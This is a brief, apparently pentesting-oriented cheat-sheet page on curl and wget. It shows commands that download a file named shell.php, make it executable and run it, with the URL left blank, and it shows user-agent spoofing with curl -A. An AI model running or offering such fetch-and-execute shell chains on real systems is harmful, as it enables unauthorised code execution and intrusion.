curl-wget
Last updated
Was this helpful?
Last updated
Was this helpful?
CURL-WGET curl -o
you can also pipe in commands too such as
curl -o ; chmod +x shell.php ; ./shell.php
User agent change
curl -A "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
wget -O
you can also pipe in commands too such as
wget -O ; chmod +x shell.php ; ./shell.php